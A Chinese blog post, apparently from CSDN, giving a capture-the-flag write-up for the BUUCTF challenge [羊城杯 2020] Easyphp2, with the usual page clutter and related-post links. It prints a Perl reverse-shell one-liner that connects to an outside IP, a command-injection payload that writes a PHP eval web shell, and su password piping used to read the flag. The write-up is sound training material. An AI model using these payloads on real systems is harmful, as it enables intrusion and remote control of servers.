深入解析[羊城杯 2020]Easyphp2

已于 2024-03-07 17:05:09 修改
阅读量373 收藏 4
点赞数 3
分类专栏: 安全做题 文章标签: web安全 安全 linux
于 2024-03-07 17:03:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49849300/article/details/136539043
版权

环境:

buuctf

前置知识:

php伪协议读文件

linux命令

蚁剑连接一句话木马

官方wp

先放官方wp,写的比较简易。

GitHub - gwht/2020YCBCTF: 2020羊城杯官方writeup及源码

system('perl -e \'use
Socket;$i="39.108.164.219";$p=60007;socket(S,PF_INET,SOCK_STREAM,getprotobyna
me("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -
i");};\'');

解题

0.遇到回显:Sorry, only people from GWHT are allowed to access this website.23333

说明要求 Cookie: pass=GWHT

1.php伪协议

/?file=php://filter/read=convert.iconv.utf-8.utf-16/resource=GWHT.php

2.用|来绕过命令

/?file=GWHT.php&count='|ls||'

3.直接命令执行看不到flag,命令执行写马

?file=GWHT.php&count='|echo "<?= eval($_POST['cmd'])?>" > a.php||'

4.蚁剑连接

http://11e23de7-ded3-4d42-aec4-c3f33d1e3a45.node5.buuoj.cn:81/a.php

密码:cmd

5.登进去 根目录没有flag

两种方法:

a.手动翻找

b.打开蚁剑命令行 find / -name flag*

但是这个直接执行不了

所以用 find /GWHT -name flag*

直接读flag.txt是不行的,没有权限。

6.手动翻找其他线索

https://www.somd5.com/

877862561ba0162ce610dd8bf90868ad414f0ec6

GWHTCTF #是用户的密码

7.直接切换用户不行,因为蚁剑shell不是完整tty

两种方法:

a.如何将简单的Shell转换成为完全交互式的TTY

如何将简单的Shell转换成为完全交互式的TTY-腾讯云开发者社区-腾讯云

b.直接执行命令

su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'

但是报错,所以

c.通过管道符传输密码

printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'

flag{c0d6db50-40f4-4ccf-bc98-8115c6292f50}

FR0-1
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
EasyPHP5-2-17.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
EasyPHP5-3-14
07-22
资源名称:EasyPHP5-3-14工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
BUUCTF[web][p6][[羊城 2020]Easyphp2]
qq_29060627的博客
05-06 1065
第1步,开局: http://url/?file=GWHT.php 第2步:使用dirsearch-master扫描网站:得robots.txt 内容为: Disallow: /?file=check.php 看样子是文件包含: 第3步,编码访问得源码[ GWHT.php check.php index.php ] ,index.php无法继续包含: http://url/?file=php://filter/convert.%25%36%32ase64-encode/resourc
BUUCTF--[羊城 2020]Easyphp2
qq_46263951的博客
08-18 1252
进入后的页面 根据题目提示我们可以知道这是一道PHP代码审计的题 所以使用伪协议查看源代码,这里使用的是两次url编码绕过 /?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php <!DOCTYPE html> &lt
buuctf easyphp
qq_50613938的博客
12-16 481
我们用这个输出 但我不明白为什么,不能直接把“POST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"GET",然后配合_POST[‘a’];” 全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"_GET",然后配合P​OST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替".
BUUCTF:[ISITDTU 2019]EasyPHP
末初的CSDN博客
04-27 4227
题目地址:BUUCTF:[ISITDTU 2019]EasyPHP Refer: https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/ 思路很简单,绕过这两个if即可任意代码执行 先看一下第一个正则匹配 看不懂的推荐使用这个网站:https://regex101.com/ if ( preg_match('/[\x00- 0-9\'"...
BUUCTF:GYCTF2020/新春战疫Easyphp
末初的CSDN博客
03-29 3098
参考:https://blog.csdn.net/qq_42181428/article/details/104474414?fps=1&locationNum=2 新春战疫原题在BUU上的复现,反序列化配合字符逃逸 源码泄露www,zip PHP反序列化的字符逃逸的原理 PHP在进行反序列化的时候,只要前面的字符串符合反序列化的规则并能成功反序列化,那么将忽略后面多余的字符串 获取f...
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
EasyPHP5-2-17
07-22
资源名称:EasyPHP5-2-17工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
2020YCBCTF羊城官方Writeup.pdf
10-28
2020YCBCTF羊城官方Writeup.pdf
[羊城 2020]Easyphp2
paidx0
08-23 396
[羊城 2020]Easyphp2
[GYCTF2020]Easyphp
feng的博客
03-08 1893
前言 知识点: www.zip源码泄露 PHP反序列化链POC 代码审计 WP 进入环境,题目是easyphp我就感觉要审源码。。。试了一下常见的泄露,发现存在www.zip。把代码下载下来进行一下审计,发现update.php和lib.php可以利用: <?php session_start(); function safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\
2020羊城CTF随缘Writeup
sash1mi
01-09 3402
2020羊城CTF随缘Writeup docker源码链接: https://github.com/k3vin-3/YCBCTF2020 Web部分 a_piece_of_java 考点:源码审计、java反序列化 PS:这道题没整明白,直接给出官方WP 第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接: DatabaseInfo databaseInfo = new DatabaseInfo(); databaseInfo.setHost("x.x.x.x"); datab
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 557
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
攻防世界 easyphp
09-11
同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值